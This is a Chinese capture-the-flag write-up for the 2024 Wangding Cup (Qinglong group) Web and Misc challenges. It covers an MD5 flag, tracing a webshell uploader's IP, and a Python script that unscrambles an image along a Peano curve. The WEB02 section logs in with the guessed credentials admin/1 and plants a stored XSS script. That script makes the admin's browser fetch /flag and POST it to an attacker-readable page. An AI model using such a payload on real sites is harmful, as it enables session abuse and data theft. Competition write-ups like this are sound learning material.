2024网鼎杯青龙组Web+Misc部分WP
MISC01
发现人员的定位信息存在泄露,请对其进行分析。flag为用户位置信息进行32位md5哈希值
我们在这里可以找到关于Location——information信息
尝试把val值继续32位md5哈希加密,拿到flag
flag{4c4e66ea9aa659b1cac5d4fe327bbfc1}
MISC03
第 1 步:看到好几个上传木马的 ip,都试一试,最终 ip 为 39.168.5.60 的为
正确攻击 ip
MISC04
推测应该是按着曲线的轨迹将像素还原到原来的位置
脚本如下:
from PIL import Image
from tqdm import tqdmdef peano(n):if n == 0:return [[0,0]]else:in_lst = peano(n - 1)lst = in_lst.copy()px,py = lst[-1]lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + 1 + i[0], py - i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px - i[0], py - 1 - i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + i[0], py - 1 - i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + 1 + i[0], py + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)return lstorder = peano(6)img = Image.open(r"C:\Users\ASUSROG\Desktop\chal.png")width, height = img.sizeblock_width = width # // 3
block_height = height # // 3new_image = Image.new("RGB", (width, height))for i, (x, y) in tqdm(enumerate(order)):# 根据列表顺序获取新的坐标new_x, new_y = i % width, i // width# 获取原图像素pixel = img.getpixel((x, height - 1 - y))# 在新图像中放置像素new_image.putpixel((new_x, new_y), pixel)new_image.save("rearranged_image.jpg")
拿到二维码,扫描拿到flag
参考:IrisCTF2024 | 1r0ny
WEB02(环境关了没图片呜呜呜)
第 1 步:打开网页,目录扫描扫描到/flag,尝试访问,提示只有 boos 可以访
问。
第 2 步:尝试登录,admin/1,登录成功。
第 3 步:
<script>fetch('/flag').then(response=>response.text()).then(data=>{fetch('/content/a9571d0
e889a28847d8682903',{method:'POST',headers:{'Content-Type':'application/x-www-form-
urlencoded'},body:"content="+data});})</script>
更新之后提交给 boos,刷新页面拿到 flag